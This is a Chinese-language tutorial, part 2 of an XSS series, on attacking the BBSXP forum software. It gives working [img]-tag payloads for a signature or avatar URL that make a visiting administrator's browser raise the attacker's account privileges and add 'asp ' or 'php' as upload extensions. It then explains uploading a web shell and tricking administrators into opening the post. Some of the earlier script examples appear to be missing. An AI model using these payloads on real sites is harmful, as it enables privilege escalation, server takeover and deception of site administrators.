详解XSS跨站脚本攻击（2）

二、来自内部的跨站攻击

寻找跨站漏洞

如果有代码的话比较好办，我们主要看代码里对用户输入的地方和变量有没有做长度和对”《”，”》”，”;”，”’”等字符是否做过滤。还有要注意的是对于标签的闭合，像测试QQ群跨站漏洞的时候，你在标题处输入 ，代码是不会被执行的，因为在源代码里，有其它的标签未闭合，如少了一个，这个时候，你只要闭合一个，代码就会执行，如：你在标题处输入 ，这样就可以弹出一个test的框。

如何利用

我先以BBSXP为例，过程已做成动画，详情可见光盘中的动画。我举BBSXP中其中两个比较好用的跨站漏洞点为例。

a.先注册一个普通用户，我这里注册的用户是linzi.然后我们在个人签名里写入：

以下为引用的内容：

［img］http://127.0.0.1/bbsxp/admin_user.asp ？ menu=userok&username=linzi&membercode= 5&userlife=1&posttopic=3& amp;money=9&postrevert=0& amp;savemoney=0&deltopic=1®time=2005-9-1+1％3A1％3A1&experience=9&country=％D6％D0％B9％FA&&Submit=+％B8％FC+％D0％C2+［/img］

c.然后发个贴子，可以结合其它技术欺骗管理员浏览发的贴子。

d.因为是测试，所以我们以管理员身份登陆，然后打开贴子，我们会发现，linzi已经变成了社区区长工，如图一所示

除此之外我们只要在个人签名里输入

以下为引用的内容：
［img］http://127.0.0.1/bbsxp/admin_setup.asp？ menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout= 6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile =102400&UpFileGenre=gif|jpg|asp％20|rar［/img］

同样发个贴子等，只要管理员打开了，就会加了一个扩展名为asp （有空格）的上传扩展，这个时候，你只要上传一个newmm.asp （有空格）就可以得到一个shell.

上面的攻击多多少少有点局限性，虽然可以得到shell，但是隐蔽性不太好，因为签名处受到了长度的限制，不能超过255个字符。我们可以结合flash跨站实现更为隐蔽的攻击，对于flash木马的制作，下面见哥们丰初的介绍。

再利用如下：

修改一下个人头像的url，输入代码如下：

以下为引用的内容：
admin_setup.asp？

menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout= 6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile= 102400&UpFileGenre=gif|jpg|php|rar

再接着欺骗管理员打开你的资料或者浏览你的贴子，当管理员打开后，会在后台自动加个php扩展名的后辍，因为bbsxp在个人头像url里过滤了空格，％，所以我们只能加个不包括空格的其它扩展，当然你也可以加个shtml的扩展，有了它你就可以用来查看源代码，然后进一步攻击。